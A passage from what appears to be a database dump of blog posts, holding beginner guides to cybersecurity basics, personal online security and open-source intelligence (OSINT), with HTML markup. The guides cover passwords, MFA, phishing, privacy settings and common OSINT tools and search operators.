[&amp;&gt;ul]:!pb-0\" value=\"2\">Read introductory resources, from blogs to beginner-friendly eBooks.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Practice Good Security Habits</strong></b></li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Strengthen your passwords and avoid reusing them across accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Enable MFA and ensure software updates are a regular routine.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Use Cybersecurity Tools</strong></b></li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Install antivirus software and configure a firewall to protect your devices.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Utilize encryption to protect sensitive business and personal files.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"4\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Get Hands-On Experience</strong></b></li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Take online cybersecurity courses on platforms like Coursera, Udemy, or edX.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Join Capture the Flag (CTF) games to test your knowledge in real-world scenarios.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Explore virtual labs to practice using security tools.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"5\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Stay Updated</strong></b></li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Regularly follow cybersecurity blogs and industry reports.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Join professional communities to share knowledge and stay informed about emerging threats.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Path to Better Cybersecurity Starts Today</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is no longer optional; it’s essential in a world where threats evolve daily. Whether you\'re protecting your personal accounts or securing a business network, understanding and implementing the basics of cybersecurity can keep your data safe and reduce risks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Remember, the key to success is being proactive, persistent, and informed. Armed with these <b><strong class=\"font-bold\">cybersecurity tips</strong></b> and best practices, you’re now well-equipped to defend against cyber threats. For more in-depth guidance or interactive resources on <b><strong class=\"font-bold\">cybersecurity basics</strong></b>, continue exploring trusted blogs and sign up for practical training programs. Start small, stay consistent, and grow your security skills over time!</p>', '', NULL, NULL, 1, 'draft', '2024-08-06 05:48:36', '2026-01-12 21:41:44', 'Information Security', 'The Basics of Cybersecurity: A Beginner\'s Guide', '', NULL),
(114, 'How to Secure Yourself Online: from OSINT Perspective', 'how-to-secure-yourself-online-from-osint-perspective', 'In today\'s digital age, online security is more critical than ever. With the increasing use of the internet for various activities, from social networking to financial transactions, safeguarding your online presence has become essential. This blog will delve into how you can secure yourself online from an Open Source Intelligence (OSINT) perspective.\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>Understanding OSINT</strong></h2>\r\n<strong>Open Source Intelligence (OSINT)</strong> refers to the practice of collecting and analyzing publicly available information from various sources. This information can be gathered from social media, forums, websites, and other online platforms. While OSINT is often used for investigative purposes, it can also be leveraged to enhance personal online security.\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>Steps to Secure Yourself Online</strong></h2>\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>1. Conduct a Personal OSINT Audit</strong></h2>\r\nStart by conducting an OSINT audit on yourself. This involves searching for your name, email addresses, phone numbers, and other personal information online to see what information is publicly accessible. Use search engines, social media platforms, and specialized OSINT tools to gather this data.<strong>Training Resource:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.isaca.org/credentialing/cybersecurity-audit-certificate\" target=\"_blank\" rel=\"nofollow noopener\">Cybersecurity Audit Certificate - ISACA</a>\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>2. Manage Your Digital Footprint</strong></h2>\r\nYour digital footprint consists of all the information you leave behind when using the internet. To manage it effectively:\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong>Review Privacy Settings:</strong> Regularly review and update the privacy settings on your social media accounts to control who can see your information.</li>\r\n 	<li><strong>Limit Personal Information:</strong> Avoid sharing sensitive information such as your home address, phone number, and financial details online.</li>\r\n 	<li><strong>Delete Unnecessary Accounts:</strong> Remove old or unused online accounts to reduce the amount of personal information available.</li>\r\n</ul>\r\n<strong>Training Resource:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.coursera.org/learn/digital-footprint\" target=\"_blank\" rel=\"nofollow noopener\">Digital Footprint - Coursera</a>\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>3. Use Strong, Unique Passwords</strong></h2>\r\nPasswords are the first line of defense against unauthorized access. Follow these guidelines:\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong>Create Strong Passwords:</strong> Use a combination of upper and lower case letters, numbers, and special characters.</li>\r\n 	<li><strong>Unique Passwords:</strong> Avoid using the same password for multiple accounts.</li>\r\n 	<li><strong>Password Manager:</strong> Consider using a password manager to store and generate strong passwords.</li>\r\n</ul>\r\n<strong>Training Resource:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.terranovasecurity.com/blog/how-to-create-a-strong-password-in-7-easy-steps\" target=\"_blank\" rel=\"nofollow noopener\">How to Create a Strong Password in 7 Easy Steps - Terranova Security</a>\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>4. Enable Two-Factor Authentication (2FA)</strong></h2>\r\nTwo-factor authentication adds an extra layer of security by requiring a second form of verification in addition to your password. Enable 2FA on all accounts that support it, such as email, social media, and financial services.<strong>Training Resource:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://freedom.press/training/2fa-beginners/\" target=\"_blank\" rel=\"nofollow noopener\">Two-factor Authentication for Beginners - Freedom of the Press Foundation</a>\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>5. Be Wary of Phishing Attacks</strong></h2>\r\nPhishing attacks involve tricking individuals into providing personal information through deceptive emails or websites. Protect yourself by:\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong>Verifying Email Sources:</strong> Check the sender\'s email address and look for signs of phishing, such as spelling errors or suspicious links.</li>\r\n 	<li><strong>Avoiding Clicks on Unknown Links:</strong> Do not click on links or download attachments from unknown or untrusted sources.</li>\r\n 	<li><strong>Using Anti-Phishing Tools:</strong> Utilize browser extensions and security software that provide phishing protection.</li>\r\n</ul>\r\n<strong>Training Resource:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.cisa.gov/secure-our-world/teach-employees-avoid-phishing\" target=\"_blank\" rel=\"nofollow noopener\">Teach Employees to Avoid Phishing - CISA</a>\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>6. Secure Your Devices</strong></h2>\r\nEnsure that your devices are secure by:\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong>Updating Software:</strong> Regularly update your operating system, browsers, and applications to protect against vulnerabilities.</li>\r\n 	<li><strong>Using Antivirus Software:</strong> Install reputable antivirus software to detect and remove malware.</li>\r\n 	<li><strong>Encrypting Data:</strong> Use encryption tools to protect sensitive data on your devices.</li>\r\n</ul>\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>7. Monitor Your Online Presence</strong></h2>\r\nContinuously monitor your online presence to detect any unauthorized use of your information. Set up alerts for your name and other personal details to receive notifications when they appear online.\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>8. Educate Yourself on Online Security</strong></h2>\r\nStay informed about the latest online security threats and best practices. Follow reputable sources and consider taking online courses or attending webinars on cybersecurity. Securing yourself online requires a proactive approach and continuous effort. By leveraging OSINT techniques, managing your digital footprint, using strong passwords, enabling two-factor authentication, and staying vigilant against phishing attacks, you can significantly enhance your online security. Remember, the more informed and prepared you are, the safer you will be in the digital world.', '', NULL, NULL, 1, 'draft', '2024-08-06 00:58:01', '2026-01-12 21:41:44', 'Information Security', 'How to Secure Yourself Online: from OSINT Perspective', '', NULL),
(115, 'What is OSINT? A Comprehensive Guide for Beginners', 'what-is-osint-a-comprehensive-guide-for-beginners', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Open Source Intelligence (OSINT) is the process of collecting, analyzing, and utilizing publicly available information from various open sources. This could range from social media profiles to publicly accessible databases, news articles, public records, and websites. OSINT is widely used across sectors like cybersecurity, journalism, law enforcement, and even business intelligence to gather actionable insights.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Should You Learn OSINT?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Learning OSINT equips you with valuable skills that can be applied across multiple domains. Here’s why it’s worth exploring:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Cybersecurity</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">OSINT helps identify vulnerabilities and potential threats by analyzing data and patterns. It’s an essential skill for cybersecurity professionals to proactively safeguard systems.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Personal Security</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">OSINT enhances your ability to understand and protect your online presence. By knowing what information about you is publicly available, you can take steps to safeguard your privacy.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Business Intelligence</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Many enterprises use OSINT to gather insights into competitors, monitor market trends, and gain an edge in their industries.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Benefits of OSINT for Beginners</h2>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Low Cost</strong></b>: OSINT relies on free, publicly available data, making it highly accessible for individuals and small businesses alike.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Comprehensive Insights</strong></b>: Combining multiple sources allows for well-rounded analysis.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Versatility</strong></b>: Whether for personal use, professional development, or organizational strategy, OSINT provides value in numerous contexts.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Getting Started With OSINT</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Before you begin, it’s important to understand the basic terminology and tools that make OSINT so effective.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Basic Terminology</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Sources</strong></b>: Websites, social media platforms, public records, news outlets, etc.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Tools</strong></b>: Software and online services designed to gather and interpret data effectively.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Techniques</strong></b>: Proven methods for searching, analyzing, and interpreting open-source information.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Essential Tools for OSINT Beginners</h3>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Google Dorking</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Google Dorking involves using advanced search operators to uncover precise information. Examples of operators:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">`site:` - Restrict search results to a specific website. (e.g., `site:example.com`)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">`filetype:` - Find specific file types (e.g., PDFs or spreadsheets).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">`intitle:` - Search for keywords in the title of web pages.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Example Use Case:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Search for PDFs on cybersecurity on a specific website:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\">```</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">site:example.com filetype:pdf intitle:cybersecurity</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\">```</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Social Media Search Engines</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Tools like <b><strong class=\"font-bold\">Social Searcher</strong></b> allow you to find user-generated content, mentions, and hashtags across various platforms, which can be invaluable for companies or personal research.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Example Use Case:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Input a username in Social Searcher to retrieve posts, likes, and related profiles.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Public Records Databases</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Platforms like <b><strong class=\"font-bold\">Whitepages</strong></b> and <b><strong class=\"font-bold\">Spokeo</strong></b> are excellent for uncovering publicly accessible information, such as addresses or phone numbers. From a business perspective, monitoring public records can also inform risk assessments or customer data verification.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step-by-Step Guide to Using OSINT</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Follow these steps to begin applying OSINT techniques:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 1: Start with Google Dorking</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This is a simple yet effective way to gather targeted information using advanced search operators. Experiment with combinations of operators based on your research objectives.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 2: Explore Social Media for Insights</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Social media platforms are rich sources of information. For example:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use <b><strong class=\"font-bold\">Twitter</strong></b> to search for keywords or hashtags relevant to your inquiry.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Use specialized software like <b><strong class=\"font-bold\">Social Searcher</strong></b> to obtain focused results across multiple platforms.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 3: Leverage Public Records</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Search platforms like <b><strong class=\"font-bold\">Whitepages</strong></b> or <b><strong class=\"font-bold\">Spokeo</strong></b> to locate information in public records. These tools can reveal useful details about individuals or organizations but should always be used ethically and within legal boundaries.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Practical Exercise for Beginners</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To practice, select a public figure or topic. Gather information by combining Google Dorking, social media searches, and public records tools. Document your findings and consider how these insights could be used in practical scenarios like journalism or cybersecurity.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Advanced OSINT Techniques for Professionals</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once you’ve mastered the basics, it’s time to explore advanced tools and techniques that can further elevate your OSINT game.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">OSINT Framework</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The OSINT Framework is a curated collection of tools and resources that help streamline the gathering of open-source data. It’s an excellent starting point for developing a systematic approach to research.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Data Visualization Tools</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Tools like <b><strong class=\"font-bold\">Maltego</strong></b> or <b><strong class=\"font-bold\">Graph Commons</strong></b> allow you to map relationships and connections within your data visually. For example, security professionals use these tools to create relationship diagrams that track digital attacks or online fraud.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Automated Tools for Efficient Searches</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Automation saves time in OSINT workflows. For instance, tools like:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Spiderfoot</strong></b> automates threat intelligence collection.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Mitaka</strong></b> helps extract domains, IPs, URLs, and other data from text.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Tips for Ethical and Effective Use of OSINT</h2>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Stay Ethical</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ensure compliance with legal regulations and respect privacy boundaries. Avoid accessing restricted or unauthorized data at all costs.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Cross-Verify Sources</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Always double-check the accuracy of the information by validating it with multiple reputable sources.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Keep Learning</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">OSINT tools and techniques constantly evolve. Stay updated with changes to remain at the cutting edge.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Applications of OSINT Across Industries</h2>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li 